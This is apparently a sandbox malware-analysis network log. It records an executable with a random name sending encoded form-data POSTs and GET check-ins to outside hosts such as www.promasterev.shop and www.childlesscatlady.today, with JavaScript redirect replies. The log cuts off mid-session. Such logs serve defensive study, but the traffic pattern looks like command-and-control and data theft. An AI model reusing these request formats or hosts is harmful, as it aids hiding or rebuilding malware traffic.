                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:34:01.419403076 CEST770INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 626
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:34:01 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.9606113.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.474298000 CEST743OUTPOST /abrg/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.promasterev.shop
                                                                                                                                                                                                              Origin: http://www.promasterev.shop
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.promasterev.shop/abrg/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 6e 36 55 75 30 35 55 6a 71 6c 37 62 6e 44 52 5a 51 62 4c 6e 33 4e 43 33 2f 35 65 47 64 43 32 6f 44 4b 4b 48 46 4b 45 79 70 6d 72 56 61 39 69 39 61 79 66 42 61 4b 4a 2f 66 71 37 69 56 35 71 55 4e 79 6b 33 4b 4f 4f 47 35 6a 6c 73 4a 74 4f 48 63 50 55 64 4b 78 65 78 47 6c 67 48 4d 38 43 6d 66 55 47 78 79 47 36 65 44 34 4d 46 4c 65 72 61 72 66 44 63 51 4d 47 72 57 72 43 69 67 38 48 4b 67 34 78 4d 73 52 70 45 63 36 63 66 70 32 33 55 30 76 6b 75 31 51 66 4b 6e 64 69 55 66 64 33 55 57 30 35 50 4f 68 46 74 4b 6c 66 51 34 31 6b
                                                                                                                                                                                                              Data Ascii: tpTd=LloplUxxKxeX8n6Uu05Ujql7bnDRZQbLn3NC3/5eGdC2oDKKHFKEypmrVa9i9ayfBaKJ/fq7iV5qUNyk3KOOG5jlsJtOHcPUdKxexGlgHM8CmfUGxyG6eD4MFLerarfDcQMGrWrCig8HKg4xMsRpEc6cfp23U0vku1QfKndiUfd3UW05POhFtKlfQ41k


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.9606273.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:09.021058083 CEST767OUTPOST /abrg/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.promasterev.shop
                                                                                                                                                                                                              Origin: http://www.promasterev.shop
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.promasterev.shop/abrg/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 6f 71 32 6f 68 53 4b 56 30 4b 45 78 70 6d 72 62 36 39 72 35 61 79 75 42 61 32 42 2f 64 4f 37 69 57 46 71 55 4d 43 6b 33 37 4f 4e 48 70 6a 6e 68 70 74 41 61 73 50 55 64 4b 78 65 78 47 42 4f 48 4d 6b 43 6d 76 45 47 79 51 2b 39 55 6a 34 4e 41 4c 65 72 51 4c 65 72 63 51 4d 30 72 55 66 34 69 6a 55 48 4b 67 6f 78 4e 2b 70 6f 4e 63 36 53 52 4a 33 39 46 46 79 4b 72 6e 73 2b 55 33 42 55 4d 4f 31 6c 58 33 55 6e 65 38 6f 65 34 64 6c 34 58 66 38 4d 4c 7a 51 33 55 45 4d 42 59 46 39 65 6d 53 79 7a 6e 74 2b 71 7a 67 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=LloplUxxKxeX8HqUvTtUlKl8XHDRQwbHn3JC3+9OGoq2ohSKV0KExpmrb69r5ayuBa2B/dO7iWFqUMCk37ONHpjnhptAasPUdKxexGBOHMkCmvEGyQ+9Uj4NALerQLercQM0rUf4ijUHKgoxN+poNc6SRJ39FFyKrns+U3BUMO1lX3Une8oe4dl4Xf8MLzQ3UEMBYF9emSyznt+qzg==


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.9606413.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:11.565047026 CEST1780OUTPOST /abrg/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.promasterev.shop
                                                                                                                                                                                                              Origin: http://www.promasterev.shop
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.promasterev.shop/abrg/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 75 79 32 6f 51 79 4b 45 6e 79 45 77 70 6d 72 54 61 39 6d 35 61 79 7a 42 65 61 46 2f 64 43 42 69 51 42 71 55 75 4b 6b 2b 76 69 4e 4a 70 6a 6e 6f 4a 74 4e 48 63 50 37 64 4b 67 58 78 47 52 4f 48 4d 6b 43 6d 71 41 47 6c 53 47 39 62 44 34 4d 46 4c 65 76 61 72 65 51 63 57 6c 42 72 55 62 6f 69 53 30 48 4a 42 59 78 50 4e 52 6f 4d 38 36 51 63 70 32 6f 46 46 2b 4a 72 6e 77 45 55 30 63 63 4d 4a 5a 6c 48 78 51 35 47 4f 6b 49 6d 72 31 58 51 50 35 6c 46 31 77 32 59 6c 46 63 5a 6d 39 6f 39 69 7a 41 69 4f 72 38 76 75 33 50 63 73 75 37 45 5a 2b 54 79 55 58 73 4b 66 2b 70 6b 78 76 72 44 63 65 78 61 56 52 61 6c 54 58 6d 68 46 58 67 48 30 74 6f 35 6c 70 6c 78 47 6a 61 35 2b 7a 4d 52 4b 37 30 64 69 4d 51 70 31 49 74 30 4d 68 69 46 6c 45 6d 64 55 75 72 56 72 32 6d 53 68 65 2b 75 4f 7a 78 47 66 44 37 37 4c 72 65 6c 57 2b 4e 79 46 62 31 73 42 31 75 31 33 58 44 64 47 52 76 50 77 76 6e 73 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=LloplUxxKxeX8HqUvTtUlKl8XHDRQwbHn3JC3+9OGuy2oQyKEnyEwpmrTa9m5ayzBeaF/dCBiQBqUuKk+viNJpjnoJtNHcP7dKgXxGROHMkCmqAGlSG9bD4MFLevareQcWlBrUboiS0HJBYxPNRoM86Qcp2oFF+JrnwEU0ccMJZlHxQ5GOkImr1XQP5lF1w2YlFcZm9o9izAiOr8vu3Pcsu7EZ+TyUXsKf+pkxvrDcexaVRalTXmhFXgH0to5lplxGja5+zMRK70diMQp1It0MhiFlEmdUurVr2mShe+uOzxGfD77LrelW+NyFb1sB1u13XDdGRvPwvns9HDdClK9ekXCnPkne3Zvo8qh4MgXezQTVbqdfutNRcpOLVM0HPC3+eE+3XN2PzLCRa8EHfWkjlMOdw+mPYNSk8+Y4/JXZYeTpj9qmsqLvDX3nygzPMYE/nJL6/Ys9k6Xk7iexwVXyHNsYLlkWF7fEcMICx5Hmgm3RMGi4yoq9TUD9CZT3AlDRNUMPDpRdGfadavoiFDyrFot5TJ/xwvOLaH65aCZ4YStXZI9phQJIjSzNoqOPfNfbTSHz0AMxNG2EspurbTEQyZaN9hjTxlsNmFolAAzXd1cRFIxvZ2hr9guVbuF6Ncwo4y+VDHE0I46RrEhY5S8JL3z8pFVhR/qqUKNN54RrF8YRSVaxWayUU+11qVJml/j4MiNSbI/rKOmvilPJzIhJNTMKUNJT1ziVlkxA9RXhQ8AiHDB+MPw08iiYjPPsC6MFpzGLJ3d4Uw8Na8MuoQmaufzGQIv1laDBjB28QTc7ctw779kHmR4SCfnX8DuyAptnu1QACHzAc7rIcIq1fEoddlwChEHVN8PjOn+KchPqXiZNMvX/J4AGCIauytHDX1kV6pe4k8X0jYBicWLPKGv2JOAoyN14Au95EOUafwjyyuT7/k1RE8FlbjeogEYYK6HmPlW+cW1fR6kk7hpmzdsZvgZ3fuld8zu2uUSQs3Q1fXKs3 [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.9606573.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.109869957 CEST477OUTGET /abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww== HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.promasterev.shop
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:34:14.561187983 CEST395INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:34:14 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 255
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 26 74 70 54 64 3d 47 6e 41 4a 6d 69 52 50 50 69 79 48 32 54 6d 66 75 42 56 6e 73 5a 6f 58 64 47 66 30 46 55 50 46 79 53 67 51 68 74 56 4f 4d 34 47 77 6e 44 71 39 44 6e 76 68 39 65 50 43 57 59 74 4a 78 4c 4c 41 55 2b 79 47 30 64 32 63 32 56 38 35 59 4d 69 46 33 75 2b 43 48 34 57 68 77 2b 5a 38 4b 38 4c 6d 65 35 41 42 6d 6e 70 6e 4a 64 73 57 7a 36 67 38 77 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww=="}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.9606793.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.625890017 CEST761OUTPOST /itly/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.childlesscatlady.today
                                                                                                                                                                                                              Origin: http://www.childlesscatlady.today
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.childlesscatlady.today/itly/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 64 72 32 52 72 59 46 6c 44 50 70 4e 79 4d 42 65 72 46 71 78 4a 37 63 4d 54 73 71 58 65 7a 61 2b 6c 41 41 46 6f 68 67 4b 45 59 63 58 56 2f 61 50 33 4b 51 50 39 68 6d 33 68 6b 31 61 64 64 4f 30 50 68 6e 52 31 59 4b 57 57 39 52 57 34 36 46 32 48 46 31 38 76 53 62 64 72 37 56 67 2b 42 43 4f 6c 73 69 74 76 4c 63 2b 59 48 41 4e 4b 78 41 34 74 31 48 6f 56 6c 78 59 36 35 32 73 6d 53 5a 4c 45 51 76 69 53 42 6e 67 70 36 67 42 65 4e 66 6e 61 75 4b 44 72 68 67 6a 69 2f 38 6c 30 46 58 42 44 56 63 32 79 70 4c 6d 58 51 44 46 46 4a 64
                                                                                                                                                                                                              Data Ascii: tpTd=gu6he7xKy/oLfdr2RrYFlDPpNyMBerFqxJ7cMTsqXeza+lAAFohgKEYcXV/aP3KQP9hm3hk1addO0PhnR1YKWW9RW46F2HF18vSbdr7Vg+BCOlsitvLc+YHANKxA4t1HoVlxY652smSZLEQviSBngp6gBeNfnauKDrhgji/8l0FXBDVc2ypLmXQDFFJd


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.9606983.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:22.176304102 CEST785OUTPOST /itly/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.childlesscatlady.today
                                                                                                                                                                                                              Origin: http://www.childlesscatlady.today
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.childlesscatlady.today/itly/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 6e 61 77 67 38 41 45 72 35 67 4c 45 59 63 59 31 2f 62 46 58 4c 53 50 39 64 55 33 6a 77 31 61 64 5a 4f 30 4c 6c 6e 52 47 77 4a 45 57 39 54 44 49 36 48 79 48 46 31 38 76 53 62 64 6f 47 36 67 2b 70 43 4f 56 38 69 69 75 4c 66 68 6f 48 50 46 71 78 41 75 74 31 44 6f 56 6c 66 59 2b 35 49 73 6a 57 5a 4c 46 41 76 69 44 42 67 72 70 36 6d 63 75 4d 52 68 37 66 61 4b 35 78 66 69 53 6e 61 7a 58 52 38 43 69 31 43 6e 41 67 51 7a 41 51 6b 43 69 41 31 73 38 63 42 56 31 78 66 78 30 65 4c 36 56 64 78 34 4b 56 6e 4a 51 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=gu6he7xKy/oLf8b2QMkFnjPuDSMBXLFuxJHcMRA6Xsnawg8AEr5gLEYcY1/bFXLSP9dU3jw1adZO0LlnRGwJEW9TDI6HyHF18vSbdoG6g+pCOV8iiuLfhoHPFqxAut1DoVlfY+5IsjWZLFAviDBgrp6mcuMRh7faK5xfiSnazXR8Ci1CnAgQzAQkCiA1s8cBV1xfx0eL6Vdx4KVnJQ==


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              11192.168.2.9607153.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:24.727288008 CEST1798OUTPOST /itly/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.childlesscatlady.today
                                                                                                                                                                                                              Origin: http://www.childlesscatlady.today
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.childlesscatlady.today/itly/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 2f 61 77 53 6b 41 46 4b 35 67 49 45 59 63 56 56 2f 65 46 58 4c 54 50 35 4a 51 33 6a 74 43 61 66 52 4f 32 75 78 6e 58 33 77 4a 65 47 39 54 63 59 36 61 32 48 46 67 38 76 69 68 64 6f 57 36 67 2b 70 43 4f 54 34 69 72 66 4c 66 79 34 48 41 4e 4b 78 32 34 74 31 6e 6f 56 74 70 59 2b 74 59 74 58 69 5a 4c 6b 77 76 6b 31 31 67 30 5a 36 6b 64 75 4e 4d 68 37 53 41 4b 35 74 35 69 53 54 67 7a 58 70 38 53 31 46 66 6a 79 78 47 68 67 51 41 43 56 6b 54 6f 62 49 39 51 58 59 57 76 6c 2b 78 74 77 35 68 35 4f 51 30 65 50 69 5a 48 79 62 72 67 53 62 38 2f 78 69 35 70 5a 33 72 44 58 48 56 6e 37 6f 4a 58 73 36 54 59 70 48 71 52 61 50 65 44 56 37 31 58 68 55 35 4f 66 2f 42 42 4d 35 73 30 61 65 72 31 47 5a 70 79 5a 53 46 69 76 61 43 6e 4d 64 6e 2f 37 74 42 33 53 78 61 77 46 75 51 4e 61 62 41 38 59 78 41 38 75 48 6a 77 66 35 4f 66 66 56 36 4d 57 4f 34 48 59 4c 65 44 34 31 43 79 73 44 43 64 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=gu6he7xKy/oLf8b2QMkFnjPuDSMBXLFuxJHcMRA6Xs/awSkAFK5gIEYcVV/eFXLTP5JQ3jtCafRO2uxnX3wJeG9TcY6a2HFg8vihdoW6g+pCOT4irfLfy4HANKx24t1noVtpY+tYtXiZLkwvk11g0Z6kduNMh7SAK5t5iSTgzXp8S1FfjyxGhgQACVkTobI9QXYWvl+xtw5h5OQ0ePiZHybrgSb8/xi5pZ3rDXHVn7oJXs6TYpHqRaPeDV71XhU5Of/BBM5s0aer1GZpyZSFivaCnMdn/7tB3SxawFuQNabA8YxA8uHjwf5OffV6MWO4HYLeD41CysDCd8PybYr5vjKac2COWL1e9Mey4op2QXkxSOgHBjGV0dxDOunrOUZhy14ccn2s2f6+dbMpsKMvbFVPoyH+y5uw1YB0Z4Zh6VUSuOeYVWv9I2DHcBkK80YMD0DqGwTpih+mp4O+905ciB7+pCAnifmZihbroVYLuAEO6YUimKxat+kuMIdBc9pkU+cAJrgcY5TQsnERjIKw283aKud350cziPWii/0iuCykIJkGAK7IE5H7qtb5Woz/tkaQCI8iIE60xx6G45FEYwxxmuR2akgs3wHph60esGJoozCwL1a2tPXeDTfL/+IKdsXY8cbC3r5bhI+1gMj5NLx0/J/epn/j27MrRyyGMbbgkmtVViMdZPhtL5iyPWzUeso0ZYXQMoXWmynr1B8xNAl041PwKHHJmwleoHeKGBLHo/QSo48FKAPwOhODdUsu8OJGL8kLc9CDzafBs2Wn721kPzWdmIkNy3ZSfLzEtjQLq/PNsTZJfoGidGiAW/TX+uJVMFP2PLAGwoBFRgsMNxkgbrsSAYeqyzQVw6APl7NnWILyQW2bvtAJoHcwJIiOPEsFNBMzAEsnJwYJimHbuhX2Jd4Btm6h0ZAbclc1zemwFTxCdgB3ZKvqRxf1WeATNZgYB6Yx2+CSqXlNmMQAL2BAFhuUPMgVsj4InRUcBHBjKq8 [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              12192.168.2.9607283.33.130.190801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.265856981 CEST483OUTGET /itly/?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.childlesscatlady.today
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.650372028 CEST395INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:34:28 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 255
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 70 54 64 3d 74 73 53 42 64 4c 41 36 67 76 38 34 59 38 47 63 59 75 67 2f 6a 44 43 79 43 77 38 59 4c 59 78 43 6c 5a 53 69 4f 41 30 47 58 4b 6e 57 38 43 73 75 45 62 51 39 59 46 77 66 61 47 50 53 4a 6c 57 63 50 5a 6c 56 32 54 64 70 4f 50 51 77 77 38 74 64 53 54 6f 75 56 45 42 32 43 61 71 75 30 57 56 73 2f 38 4b 55 55 4a 4f 4e 6e 4f 4e 77 66 41 45 41 30 67 3d 3d 26 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj"}</script></head></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              13192.168.2.960775203.175.9.128801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.490788937 CEST734OUTPOST /7un9/ HTTP/1.1
